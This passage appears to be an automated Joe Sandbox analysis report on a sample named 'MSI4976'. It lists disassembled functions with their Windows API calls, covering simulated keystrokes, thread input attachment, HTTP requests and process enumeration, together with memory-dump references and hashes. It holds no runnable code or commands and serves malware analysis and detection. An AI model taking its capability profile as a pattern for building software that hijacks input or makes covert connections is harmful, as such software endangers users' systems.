                                          • Part of subcall function 00347616: Sleep.KERNEL32(00000000,?,00340127,?,0032125D,00000058,?,?), ref: 0034763C
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0034BAA0
                                        • GetStartupInfoW.KERNEL32(?,003D6990,00000064,00346B14,003D67D8,00000014), ref: 0034BAF9
                                        • __calloc_crt.LIBCMT ref: 0034BB44
                                        • GetFileType.KERNEL32(00000001), ref: 0034BB8B
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0034BBC4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 1426640281-0
                                        • Opcode ID: bd1cd67c8fc2c71e088eb804281f984ae6bc0870cddd3aeae7a109d6b6648a23
                                        • Instruction ID: 8447ab4882c425e8ece969d788b866577e81f7484f9f7b18b40b596c919cbf8a
                                        • Opcode Fuzzy Hash: bd1cd67c8fc2c71e088eb804281f984ae6bc0870cddd3aeae7a109d6b6648a23
                                        • Instruction Fuzzy Hash: 0A8190719047458FDB26CF68C8C06A9BBF8EF49324B24425DD4A6AF3E1CB34E842CB55
                                        Function 00364A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00364A7D
                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00363AD7,?,00000001), ref: 00364A91
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00364A98
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00363AD7,?,00000001), ref: 00364AA7
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00364AB9
                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00363AD7,?,00000001), ref: 00364AD2
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00363AD7,?,00000001), ref: 00364AE4
                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00363AD7,?,00000001), ref: 00364B29
                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00363AD7,?,00000001), ref: 00364B3E
                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00363AD7,?,00000001), ref: 00364B49
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                        • String ID:
                                        • API String ID: 2156557900-0
                                        • Opcode ID: d18a8eae581a24197915a094568e47a62f46dd063139695c50874087666bb463
                                        • Instruction ID: 4609d3b353dda9cb1397771b154e20c6b72421ee230fbfa45da93a7fdb1b6615
                                        • Opcode Fuzzy Hash: d18a8eae581a24197915a094568e47a62f46dd063139695c50874087666bb463
                                        • Instruction Fuzzy Hash: 4F319172A00244BFDB239B64EC89BBD77ADEB91311F158105F906DB1A4D7B4DD408B60
                                        Function 0035D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnumChildWindows.USER32(?,0035DD46), ref: 0035DC86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ChildEnumWindows
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 3555792229-1603158881
                                        • Opcode ID: e4e0ce8f7668fa5e418bff15a88dfdd9e3feb507ceb981c0244090047acaaa0d
                                        • Instruction ID: 65d5a3757bd47bd7a6f14fafc9fa5a80c266963367d374616914a7a918d17d0d
                                        • Opcode Fuzzy Hash: e4e0ce8f7668fa5e418bff15a88dfdd9e3feb507ceb981c0244090047acaaa0d
                                        • Instruction Fuzzy Hash: 5091A330900506AACB1EDF64C4C1FEEFB75BF14301F55811AEC5AAB261DB70695DDB90
                                        Function 003245A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                        Download Yara Rule
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003245F0
                                        • CoUninitialize.COMBASE ref: 00324695
                                        • UnregisterHotKey.USER32(?), ref: 003247BD
                                        • DestroyWindow.USER32(?), ref: 00395936
                                        • FreeLibrary.KERNEL32(?), ref: 0039599D
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003959CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        • Opcode ID: ed2446da51a3da640a3f9a18a8602ada8399da703f67169b09e0f95800045f64
                                        • Instruction ID: fe4015ced2d8469a702766d6706afe447795296294db5a73ccf97a4bcc75e290
                                        • Opcode Fuzzy Hash: ed2446da51a3da640a3f9a18a8602ada8399da703f67169b09e0f95800045f64
                                        • Instruction Fuzzy Hash: A2914E34610622DFD71BEF14E895E69F3B8FF15700F5142A9E41AAB662DB30AE56CF00
                                        Function 00389882 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 142windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00389926
                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 0038993A
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00389954
                                        • _wcscat.LIBCMT ref: 003899AF
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 003899C6
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003899F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window_wcscat
                                        • String ID: @U=u$SysListView32
                                        • API String ID: 307300125-1908207174
                                        • Opcode ID: 71806031e4a87a476235decd0559173ac55bb722bfa363c1a2cbccfa8f60b697
                                        • Instruction ID: 6ca9c8ffee09a0af36b309e467ad6918749431905570db6b4fcda80dd8d83b88
                                        • Opcode Fuzzy Hash: 71806031e4a87a476235decd0559173ac55bb722bfa363c1a2cbccfa8f60b697
                                        • Instruction Fuzzy Hash: 4B41C171A00308AFEF229F64CC85FEE77A8EF08350F15046AF589A7291C77599848B60
                                        Function 00374C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00374C5E
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00374C8A
                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00374CCC
                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00374CE1
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00374CEE
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00374D1E
                                        • InternetCloseHandle.WININET(00000000), ref: 00374D65
                                          • Part of subcall function 003756A9: GetLastError.KERNEL32(?,?,00374A2B,00000000,00000000,00000001), ref: 003756BE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                        • String ID:
                                        • API String ID: 1241431887-3916222277
                                        • Opcode ID: 3e4dd7e6be7f1932dff8256de8696234c056d7595388552aa5da229ac00b3ec2
                                        • Instruction ID: e2f87afd80374590d6d7b9f5a4f12c9983f3c68c18e3f0523c8ed5fe21fee3f3
                                        • Opcode Fuzzy Hash: 3e4dd7e6be7f1932dff8256de8696234c056d7595388552aa5da229ac00b3ec2
                                        • Instruction Fuzzy Hash: AC41A1B1501218BFEB279F64CC85FFB77ACEF09354F00811AFA099A151D778AD448BA0
                                        Function 00388DD5 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00388DF4
                                        • GetWindowLongW.USER32(017D9720,000000F0), ref: 00388E27
                                        • GetWindowLongW.USER32(017D9720,000000F0), ref: 00388E5C
                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00388E8E
                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00388EB8
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00388EC9
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00388EE3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageSend
                                        • String ID: @U=u
                                        • API String ID: 2178440468-2594219639
                                        • Opcode ID: 7b674351ba52884a09dfa8bc46dc2b0a819491206ccde86cb6ca75074130c3c4
                                        • Instruction ID: 2eefe1c2524f78c0665fe239fd8a04dcb67cd18006e19436bdd77bd5a16005f1
                                        • Opcode Fuzzy Hash: 7b674351ba52884a09dfa8bc46dc2b0a819491206ccde86cb6ca75074130c3c4
                                        • Instruction Fuzzy Hash: C031F131600251AFDB22EF58DD84F9537E9FB4A714F9A52A4F5068F2B2CBB1AC40DB41
                                        Function 0037BAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003BDBF0), ref: 0037BBA1
                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003BDBF0), ref: 0037BBD5
                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0037BD33
                                        • SysFreeString.OLEAUT32(?), ref: 0037BD5D
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 0037BEAD
                                        • ProgIDFromCLSID.COMBASE(?,?), ref: 0037BEF7
                                        • CoTaskMemFree.COMBASE(?), ref: 0037BF14
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                        • String ID:
                                        • API String ID: 793797124-0
                                        • Opcode ID: 07dfb2fe02aef7e2f4cc5e956b28bc90db8b663c5d0b4fd6647bb5b4008622bb
                                        • Instruction ID: 3ff2fec2dc996e0acd741b8c7f4b9cba5f9f18e8d2ddf18ab7a240d6bc8e7c22
                                        • Opcode Fuzzy Hash: 07dfb2fe02aef7e2f4cc5e956b28bc90db8b663c5d0b4fd6647bb5b4008622bb
                                        • Instruction Fuzzy Hash: D2F11975A00109EFCF16DFA4C884EAEB7B9FF89714F118459F909AB250DB35AE41CB50
                                        Function 0033B86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003249CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00324954,00000000), ref: 00324A23
                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0033B85B), ref: 0033B926
                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0033B85B,00000000,?,?,0033AF1E,?,?), ref: 0033B9BD
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0039E775
                                        • DeleteObject.GDI32(00000000), ref: 0039E7EB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                        • String ID:
                                        • API String ID: 2402799130-0
                                        • Opcode ID: fe30366c01b9179810d4edfcedc5196ab91ad3af8dffced81b6bd814456815b8
                                        • Instruction ID: a0728d186ebc632f40a4db0aa11813c9ca57ac11cbd75d124d9efd224a858dae
                                        • Opcode Fuzzy Hash: fe30366c01b9179810d4edfcedc5196ab91ad3af8dffced81b6bd814456815b8
                                        • Instruction Fuzzy Hash: A6618631500751CFDB37DF65E8C8B2AB7F9FB46712F114629E2868AAB0C770A890CB40
                                        Function 0033F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0039E9A0,00000004,00000000,00000000), ref: 0033F737
                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0039E9A0,00000004,00000000,00000000), ref: 0033F77E
                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0039E9A0,00000004,00000000,00000000), ref: 0039EB55
                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0039E9A0,00000004,00000000,00000000), ref: 0039EBC1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: 3b297b4606dd017677f5b8afc2fe6849cb2c096f908794e8a7f43b48c735de5e
                                        • Instruction ID: 2b23c674538d6852c386205f325174a7c0bbd3d61a9550e05e8f3a96d215bd65
                                        • Opcode Fuzzy Hash: 3b297b4606dd017677f5b8afc2fe6849cb2c096f908794e8a7f43b48c735de5e
                                        • Instruction Fuzzy Hash: 1C41FF31A08681DEDF3797388CC9B7A7A9D6B46385FE6092DF08B46D71C674E840D711
                                        Function 0035CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0035E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0035E158
                                          • Part of subcall function 0035E138: GetCurrentThreadId.KERNEL32 ref: 0035E15F
                                          • Part of subcall function 0035E138: AttachThreadInput.USER32(00000000,?,0035CD34,?,00000001), ref: 0035E166
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0035CE06
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0035CE23
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0035CE26
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0035CE2F
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0035CE4D
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0035CE50
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0035CE59
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0035CE70
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0035CE73
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: 6cfad99808b540104a872b05824b54464c3dff9cc77832e4985e62670804fe36
                                        • Instruction ID: d468cd79cc1c09278e30abba7311538e4fd79434b216ef6b251c54657c666ad7
                                        • Opcode Fuzzy Hash: 6cfad99808b540104a872b05824b54464c3dff9cc77832e4985e62670804fe36
                                        • Instruction Fuzzy Hash: E91104B1610618BEF7122F60CC8EF6A3A2DDB0E755F500415F3416B0F0CAF26D409AA4
                                        Function 0037C604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0035A857: CLSIDFromProgID.COMBASE ref: 0035A874
                                          • Part of subcall function 0035A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0035A88F
                                          • Part of subcall function 0035A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0035A89D
                                          • Part of subcall function 0035A857: CoTaskMemFree.COMBASE(00000000), ref: 0035A8AD
                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0037C6AD
                                        • _memset.LIBCMT ref: 0037C6BA
                                        • _memset.LIBCMT ref: 0037C7D8
                                        • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0037C804
                                        • CoTaskMemFree.COMBASE(?), ref: 0037C80F
                                        Strings
                                        • NULL Pointer assignment, xrefs: 0037C85D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 1300414916-2785691316
                                        • Opcode ID: 7cf7b6957eebbb2f877ba55bd56b021bb2009381ca2b222dfb1c8feb1bc8a864
                                        • Instruction ID: e90395b478c29168b02f8ab8f31f1e28187b157f5682afe6cdbc8cdfd31cb9c1
                                        • Opcode Fuzzy Hash: 7cf7b6957eebbb2f877ba55bd56b021bb2009381ca2b222dfb1c8feb1bc8a864
                                        • Instruction Fuzzy Hash: 35913D71D10228AFDB22DF94DC81EDEBBB9BF04710F108119F519AB251EB745A45CFA1
                                        Function 00381AD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00381B09
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00381B17
                                        • __wsplitpath.LIBCMT ref: 00381B45
                                          • Part of subcall function 0034297D: __wsplitpath_helper.LIBCMT ref: 003429BD
                                        • _wcscat.LIBCMT ref: 00381B5A
                                        • Process32NextW.KERNEL32(00000000,?), ref: 00381BD0
                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00381BE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
